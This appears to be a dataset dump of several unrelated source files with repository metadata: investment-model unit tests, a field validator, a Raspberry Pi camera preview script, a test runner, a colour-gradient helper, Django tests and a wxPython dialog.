inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.0,
origin = origin,
origin_partner_name = "Palotes, Perico",
)
self.assertChangesEqual(inv, """
name: GKWH00666
order_date: 2000-01-01
purchase_date: 2000-01-02
first_effective_date: 2001-01-02
last_effective_date: 2025-01-02
active: True
paid_amount: 300.0
nominal_amount: 300.0
amortized_amount: 0.0
draft: False
""",
u'CREATEDBYTRANSFER: Creada per traspàs de '
u'GKWH00069 a nom de Palotes, Perico [666]\n',
noPreviousLog=True,
)
self.assertActionsEqual(inv, u"""
type: transferin
user: {user}
timestamp: '{timestamp}'
date: 2000-08-01
frominvestment: GKWH00069
frompartner: Palotes, Perico
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_receiveTransfer_unpaid(self):
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
inv = self.setupInvestment()
with self.assertRaises(StateError) as ctx:
inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.0,
origin = origin,
origin_partner_name = "Palotes, Perico",
)
self.assertExceptionMessage(ctx.exception,
"Only paid investments can be transferred")
self.assertChangesEqual(inv, """
{}
""",
# TODO: Log error
)
def test_pact_singleParam(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
first_effective_date = isodate('2001-02-02'),
)
self.assertChangesEqual(inv, """\
first_effective_date: 2001-02-02
""",
u"PACT: Pacte amb l'inversor. "
u"first_effective_date: 2001-02-02"
u" Motiu: lo dice el jefe\n"
)
self.assertActionsEqual(inv, u"""
type: pact
user: {user}
timestamp: '{timestamp}'
date: 2016-05-01
comment: lo dice el jefe
first_effective_date: 2001-02-02
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pact_manyParams(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
first_effective_date = isodate('2001-02-02'),
last_effective_date = isodate('2001-02-04'),
)
self.assertChangesEqual(inv, """\
first_effective_date: 2001-02-02
last_effective_date: 2001-02-04
""",
u"PACT: Pacte amb l'inversor. "
u"first_effective_date: 2001-02-02, last_effective_date: 2001-02-04"
u" Motiu: lo dice el jefe\n"
)
self.assertActionsEqual(inv, u"""
type: pact
user: {user}
timestamp: '{timestamp}'
date: 2016-05-01
comment: lo dice el jefe
first_effective_date: 2001-02-02
last_effective_date: 2001-02-04
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pact_badParams(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
with self.assertRaises(StateError) as ctx:
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
badparam = 'value',
)
self.assertExceptionMessage(ctx.exception,
"Bad parameter changed in pact 'badparam'")
# TODO: PORAKI
def test_correct(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
)
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
self.assertChangesEqual(inv, """\
nominal_amount: 300.0
""",
u"CORRECTED: Quantitat canviada abans del pagament de 200.0 € a 300.0 €\n"
)
self.assertActionsEqual(inv, u"""
type: correct
user: {user}
timestamp: '{timestamp}'
oldamount: 200.0
newamount: 300.0
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_correct_badFromAmount(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
)
with self.assertRaises(StateError) as ctx:
inv.correct(
from_amount= 100.0,
to_amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Correction not matching the 'from' amount")
# TODO: Not enough, also if it has unpaid invoices
def test_correct_alreadyPaid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = isodate('2000-01-01'),
)
with self.assertRaises(StateError) as ctx:
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Correction can not be done with paid investments")
def test_partial(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = isodate('2000-01-01'),
)
inv.partial(
amount= 100.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
nominal_amount: 200.0
paid_amount: 200.0
""",
u"PARTIAL: Desinversió parcial de -100.0 €, en queden 200.0 € [666]\n"
)
self.assertActionsEqual(inv, u"""
type: partial
user: {user}
timestamp: '{timestamp}'
amount: 100.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_partial_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
)
with self.assertRaises(StateError) as ctx:
inv.partial(
amount= 100.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Partial divestment can be only applied to paid investments, "
"try 'correct'")
def test_cancel_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_cancel_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user=self.user,
timestamp=self.timestamp,
))
def test_cancel_paid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = isodate('2001-01-02'),
active = True,
)
with self.assertRaises(StateError) as ctx:
inv.cancel()
self.assertExceptionMessage(ctx.exception,
"Only unpaid investments can be cancelled")
def test_cancel_inactive(self):
inv = self.setupInvestment(
active = False,
)
with self.assertRaises(StateError) as ctx:
inv.cancel()
self.assertExceptionMessage(ctx.exception,
"Inactive investments can not be cancelled")
def test_cancel_invoiced(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user=self.user,
timestamp=self.timestamp,
))
# TODO: amortize should check
def test_amortize_noPreviousAmortization(self):
inv = self.setupInvestment(
purchase_date=isodate('2016-01-01'),
amortized_amount = 0.,
)
inv.amortize(
date = isodate('2018-01-01'),
to_be_amortized=40.,
)
self.assertChangesEqual(inv, """\
amortized_amount: 40.0
""",
u"AMORTIZATION: Generada amortització de 40.00 € pel 2018-01-01\n"
)
self.assertActionsEqual(inv, u"""
type: amortize
user: {user}
timestamp: '{timestamp}'
amount: 40.0
date: 2018-01-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_amortize_withPreviousAmortization(self):
inv = self.setupInvestment(
purchase_date = isodate('2018-01-01'),
amortized_amount = 40.,
)
inv.amortize(
date = isodate('2018-01-01'),
to_be_amortized=40.,
)
self.assertChangesEqual(inv, """\
amortized_amount: 80.0
""",
u"AMORTIZATION: Generada amortització de 40.00 € pel 2018-01-01\n"
)
def test_amortize_unpaid(self):
inv = self.setupInvestment(
purchase_date=False,
amortized_amount = 1000.0,
)
with self.assertRaises(StateError) as ctx:
inv.amortize(
date=isodate('2018-01-01'),
to_be_amortized=40.0,
)
self.assertExceptionMessage(ctx.exception,
u"Amortizing an unpaid investment")
def test_migrate(self):
inv = self.setupInvestment(
name = "GENKWH0001",
)
inv.migrate(
oldVersion = "1.0",
newVersion = "2.0",
)
self.assertChangesEqual(inv, """\
{}
""",
u"MIGRATED: "
u"Migració de la versió 1.0 a 2.0\n"
)
self.assertActionsEqual(inv,"""
type: migrate
user: {user}
timestamp: '{timestamp}'
oldversion: '1.0'
newversion: '2.0'
""".format(
user = self.user,
timestamp = self.timestamp,
))
# vim: ts=4 sw=4 et
| agpl-3.0 | 1,281,826,282,411,932,400 | 30.007742 | 163 | 0.492364 | false |
jamiepg1/minos | minos/validators/inclusion_validator.py | 1 | 1362 | from __future__ import absolute_import
from minos.errors import ValidationError
from minos.validator import Validator
class InclusionValidator(Validator):
"""
Validate whether a field's value is in a list of accepted values.
"""
def _validate(self, instance, field, **kwargs):
"""Validate whether a field's value is in a list of accepted values.
:param object instance: Python object to be validated.
:param string field: Name of field in *instance* to be validate.
:param dict kwargs: Keyword arguments. See :ref:`keyword-args` for more info.
Additionally, the following kwargs are required:
- **in\_:** A list of acceptable values for *field*.
:rtype: None
        :raises: :class:`~errors.ValidationError` if the value of *field* is not one of *in\_*.
:raises: UserWarning if *in\_* is not supplied.
"""
value = getattr(instance, field)
if not value:
return
        if not kwargs.get('in_'):
            raise UserWarning("Must provide 'in_' keyword argument for inclusion validator")
try:
valid_values = kwargs.get('in_')
assert value in valid_values
except AssertionError:
msg = '%s %s' % (field, 'is not valid.')
raise ValidationError(field, None, msg)
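# Minimal usage sketch (the model class and field values are assumptions for
# illustration; the public entry point on the Validator base class may differ):
#
#   class Order(object):
#       status = 'shipped'
#
#   InclusionValidator()._validate(Order(), 'status', in_=['pending', 'shipped'])
#   # passes silently; with in_=['pending'] it raises ValidationError instead.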
| mit | -3,107,472,991,654,700,000 | 34.842105 | 92 | 0.618943 | false |
ch1bo/ambicam | preview.py | 1 | 3567 | # Interactive preview module, run with python -i
import cv2
import numpy as np
import picamera
import picamera.array
import sys
import multiprocessing as mp
RESOLUTION = (640,480)
FRAMERATE = 5
OFFSET = 10
M = np.load('M.npy')
width, height = np.load('res.npy')
def compute_map(M_inv, x, y, width, height):
coords = []
for j in range(int(y), int(y+height)):
for i in range(int(x), int(x+width)):
coords.append([i, j, 1])
return np.dot(M_inv, np.array(coords).T).astype('float32')
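# compute_map builds, for every destination pixel (i, j) of a rectangular strip of
# the warped frame, its source coordinates in the raw camera image by applying the
# inverse homography M_inv; rows 0 and 1 of the result are the x and y lookup maps
# later passed to cv2.remap. Note the homogeneous third row is never normalised,
# which is exact only when M is affine (last row [0, 0, 1]); a general perspective
# M would require dividing the first two rows by the third.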
class HyperionOutput(picamera.array.PiRGBAnalysis):
def __init__(self, camera, M, width, height, offset=10):
super(HyperionOutput, self).__init__(camera)
self.finished = mp.Event()
self.M_inv = np.linalg.inv(M)
self.width = int(width)
self.height = int(height)
self.offset = offset
# Calculate source image maps
self.top_map = compute_map(self.M_inv, 0, 0, width, offset)
self.left_map = compute_map(self.M_inv, 0, offset, offset, height-2*offset)
self.right_map = compute_map(self.M_inv, width-offset, offset, offset, height-2*offset)
self.bottom_map = compute_map(self.M_inv, 0, height-offset, width, offset)
# TODO cv2.convertMaps to make them fix-point -> faster?
def analyze(self, img):
# warped = cv2.warpPerspective(img, M, (width,10))
# Warp image map-by-map
top = cv2.remap(img, self.top_map[0], self.top_map[1],
cv2.INTER_LINEAR).reshape(self.offset,self.width,3)
left = cv2.remap(img, self.left_map[0], self.left_map[1],
cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3)
right = cv2.remap(img, self.right_map[0], self.right_map[1],
cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3)
bottom = cv2.remap(img, self.bottom_map[0], self.bottom_map[1],
cv2.INTER_LINEAR).reshape(self.offset,self.width,3)
# Stitch and preview
cv2.imshow('original', img)
warped = np.zeros((self.height, self.width, 3), dtype='uint8')
warped[:self.offset,:] += top
warped[self.offset:-self.offset,:self.offset] += left
warped[self.offset:-self.offset,self.width-self.offset:] += right
warped[self.height-self.offset:,:] += bottom
cv2.imshow('warped', warped)
if cv2.waitKey(100) & 0xFF == ord("q"):
self.finished.set()
def settings(camera):
print('analog_gain: ', camera.analog_gain)
print('awb_mode: ', camera.awb_mode)
print('awb_gains: ', camera.awb_gains)
print('brightness: ', camera.brightness)
print('contrast: ', camera.contrast)
print('digital_gain: ', camera.digital_gain)
print('exposure_mode: ', camera.exposure_mode)
print('exposure_speed: ', camera.exposure_speed)
print('iso: ', camera.iso)
print('saturation: ', camera.saturation)
print('sensor_mode: ', camera.sensor_mode)
print('sharpness: ', camera.sharpness)
print('shutter_speed: ', camera.shutter_speed)
print('video_denoise: ', camera.video_denoise)
print('video_stabilization: ', camera.video_stabilization)
print('zoom: ', camera.zoom)
with picamera.PiCamera(resolution=RESOLUTION, framerate=FRAMERATE) as camera:
settings(camera)
with HyperionOutput(camera, M, width, height, offset=OFFSET) as output:
camera.start_recording(output, 'bgr')
while not output.finished.wait(100):
pass
camera.stop_recording()
| mpl-2.0 | -1,066,425,132,792,566,400 | 41.464286 | 95 | 0.630782 | false |
yuri-kilochek/graphematizer | tests/run.py | 1 | 5005 | import os
import os.path
import subprocess
import argparse
import collections
import itertools
import time
import sys
GRAPHEMATIZER_PATH = os.path.normpath('../graphematizer')
TERMINAL_WIDTH = 80
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('test_set', help='Test set to run.')
arg_parser.add_argument('-c', '--concurrency', type=int, default=(os.cpu_count() or 4)**3,
                        help='Maximum number of tests to run concurrently.'
                             ' Defaults to CPU count cubed, or 64 if the CPU count is unavailable.')
arg_parser.add_argument('-t', '--score_threshold', type=float, default=0.0,
                        help='If a test scores below this value it will be shown. Defaults to 0.0, showing no tests.')
args = arg_parser.parse_args()
def lcs_len(a, b):
m = len(a)
n = len(b)
    # Build the rows independently; multiplying the outer list would alias a single
    # row m+1 times, so every c[i][j] assignment would corrupt all rows at once.
    c = [[0] * (n + 1) for _ in range(m + 1)]
for i in range(1, m + 1):
for j in range(1, n + 1):
if a[i - 1] == b[j - 1]:
c[i][j] = c[i - 1][j - 1] + 1
else:
c[i][j] = max(c[i][j - 1], c[i - 1][j])
return c[m][n]
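# Example (illustrative): lcs_len("abcde", "ace") == 3, the length of their longest
# common subsequence "ace"; the table costs O(len(a) * len(b)) time and space.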
def load_graphemes(graphemes_pathname):
with open(graphemes_pathname, 'r', encoding='utf-8') as file:
return [g.rstrip() for g in file.readlines()]
class Tester:
def __init__(self, test_id):
self._test_id = test_id
plaintext_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'plaintext.txt')
self._true_graphemes_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'graphemes.txt')
self._test_graphemes_path = '~{}-{}-graphemes.txt'.format(args.test_set, '-'.join(test_id))
self._process = subprocess.Popen([GRAPHEMATIZER_PATH,
os.path.relpath(plaintext_path, GRAPHEMATIZER_PATH),
os.path.relpath(self._test_graphemes_path, GRAPHEMATIZER_PATH)])
self._result = None
@property
def result(self):
if self._result is None:
self._process.poll()
if self._process.returncode is None:
return None
if self._process.returncode != 0:
raise Exception('Test {} is bad.'.format('/'.join(self._test_id)))
true_graphemes = load_graphemes(self._true_graphemes_path)
test_graphemes = load_graphemes(self._test_graphemes_path)
os.remove(self._test_graphemes_path)
total = len(true_graphemes)
match = lcs_len([g[2:] for g in true_graphemes], [g[2:] for g in test_graphemes])
match_marked = lcs_len(true_graphemes, test_graphemes)
self._result = self._test_id, total, match, match_marked
return self._result
def enumerate_tests():
def enumerate_tests(path, test_id):
for _, dirs, files in os.walk(path):
if 'plaintext.txt' in files:
yield test_id
else:
for dir in dirs:
yield from enumerate_tests(os.path.join(path, dir), test_id + [dir])
break
yield from enumerate_tests(os.path.join(args.test_set, 'tests'), [])
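# Any directory under <test_set>/tests that directly contains a plaintext.txt is
# treated as a single test case, identified by its path components relative to
# that root (and compared against the graphemes.txt sitting next to it).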
def do_tests():
testers = collections.deque()
test_ids = iter(enumerate_tests())
while True:
while testers and testers[0].result is not None:
yield testers.popleft().result
active_count = 0
for tester in testers:
if tester.result is None:
active_count += 1
if active_count < args.concurrency:
next_id = next(test_ids, None)
if next_id is None:
break
testers.append(Tester(next_id))
else:
time.sleep(sys.float_info.epsilon)
while testers:
if testers[0].result is not None:
yield testers.popleft().result
else:
time.sleep(sys.float_info.epsilon)
def compute_scores(total, match, match_marked):
if total > 0:
return match / total, match_marked / total
else:
return 1.0, 1.0
total = 0
match = 0
match_marked = 0
print('bad tests (with score below {}):'.format(args.score_threshold))
print(' {:>14} | {:>14} | {}'.format('score', 'score marked', 'id'))
for i, (i_id, i_total, i_match, i_match_marked) in enumerate(do_tests()):
i_score, i_score_marked = compute_scores(i_total, i_match, i_match_marked)
if i_score < args.score_threshold or i_score_marked < args.score_threshold:
text = '{:>14.3f}% | {:>14.3f}% | {}'.format(i_score * 100, i_score_marked * 100, '/'.join(i_id))
print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\n')
total += i_total
match += i_match; match_marked += i_match_marked
score, score_marked = compute_scores(total, match, match_marked)
    text = '{:>14.3f}% | {:>14.3f}% | <total over {} tests>'.format(score * 100, score_marked * 100, i + 1)
print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\r')
print()
print('Done.')
| gpl-3.0 | -6,139,452,096,908,997,000 | 32.817568 | 117 | 0.57003 | false |
ceos-seo/data_cube_utilities | data_cube_utilities/transect/interpolate.py | 1 | 1702 | import numpy as np
from itertools import islice
nan = np.nan
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
def hex_to_rgb(rgbstr):
rgbstr= rgbstr.replace('#','')
hex_prefix = '0x'
r = hex_prefix + rgbstr[:2]
g = hex_prefix + rgbstr[2:4]
b = hex_prefix + rgbstr[4:]
return np.array([int(r, 16),
int(g, 16),
int(b, 16)])
def _bin_and_index(value, size):
    '''Takes two arguments: value and size. value is a float between 0 and 1; size is the number of bins into which
    we divide the range 0 to 1. The index of the bin that value falls into is returned.
    '''
for i in range(size):
if value > i/size and value <= (i + 1)/size:
return i
return 0
def get_gradient(colors, value):
    ''' Interpolate a color along a multi-stop gradient.

    colors is a list of hex color strings and value must lie between 0 and 1;
    intermediate values return an RGB color interpolated between the two
    surrounding gradient stops, and a NaN value maps to an all-NaN color.
    '''
if np.isnan(value):
return np.array([nan,nan,nan])
colors = [np.array(hex_to_rgb(color)) for color in colors]
color_pairs = list(window(colors))
size = len(color_pairs)
index = _bin_and_index(value,size)
color1,color2 = color_pairs[index]
direction = (color2 - color1).astype(float)
v = value * size - index
return (v * direction) + color1
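# Minimal usage sketch (the hex stops are assumptions for illustration): sampling a
# two-stop black-to-white gradient at its midpoint yields mid grey.
#
#   get_gradient(['#000000', '#ffffff'], 0.5)
#   # -> array([127.5, 127.5, 127.5])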
| apache-2.0 | -6,673,177,766,192,212,000 | 28.859649 | 125 | 0.583431 | false |
prabhugs/mynote | mynote/notes/tests.py | 1 | 1217 | from django.test import TestCase
import datetime
from django.utils import timezone
from notes.models import Post
# Create your tests here.
class PostMethodTests(TestCase):
def test_waspublishedrecently_with_future_post(self):
"""
        :return: False for a post whose published_date is in the future.
"""
time = timezone.datetime.now() + datetime.timedelta(days=30)
future_post = Post(published_date = time)
self.assertEqual(future_post.waspublishedrecently(), False)
def test_waspublishedrecently_with_old_post(self):
"""
        :return: False for a post whose published_date is more than 24 hours in the past.
        """
        time = timezone.datetime.now() - datetime.timedelta(days=30)
        old_post = Post(published_date=time)
        self.assertEqual(old_post.waspublishedrecently(), False)
def test_waspublishedrecently_with_recent_post(self):
"""
        :return: True for a post whose published_date is within the last 24 hours.
        """
        time = timezone.datetime.now() - datetime.timedelta(hours=1)
        recent_post = Post(published_date=time)
        self.assertEqual(recent_post.waspublishedrecently(), True)
| mit | -825,587,557,338,921,200 | 37.0625 | 83 | 0.677896 | false |
mikan/racm | src/racm_ui_edit_dialog.py | 1 | 1597 | """Subclass of EditDialog, which is generated by wxFormBuilder."""
import wx
import racm_ui
# Implementing EditDialog
class EditDialog(racm_ui.EditDialog):
_main_frame = None
_row = -1
def __init__(self, parent, main_frame, host, port, name, row):
racm_ui.EditDialog.__init__(self, parent)
self._main_frame = main_frame
        self.host_text.SetValue(host)
        self.port_text.SetValue(str(port))  # set once; wx text controls expect string values
self.name_text.SetValue(name)
self._row = row
def show_dialog(self, message):
dialog = wx.MessageDialog(None, message, self.GetTitle(), wx.OK | wx.ICON_WARNING)
dialog.ShowModal()
dialog.Destroy()
def show_missing_error(self, value_type):
self.show_dialog("Please input the " + value_type + ".")
def show_illegal_error(self, value_type, character):
self.show_dialog("Illegal character \"" + character + "\" contained in " + value_type + ".")
# Handlers for EditDialog events.
def on_ok_clicked(self, event):
if self.host_text.IsEmpty():
self.show_missing_error("host")
return
if ":" in self.host_text.Value:
self.show_illegal_error("host", ":")
return
if self.port_text.IsEmpty():
self.show_missing_error("port")
return
host = self.host_text.Value + ":" + self.port_text.Value
self._main_frame.edit_item(host, self.name_text.Value, "", self._row)
self.Destroy()
def on_cancel_clicked(self, event):
self.Destroy()
| bsd-3-clause | -3,549,579,078,472,662,500 | 32.270833 | 100 | 0.603632 | false |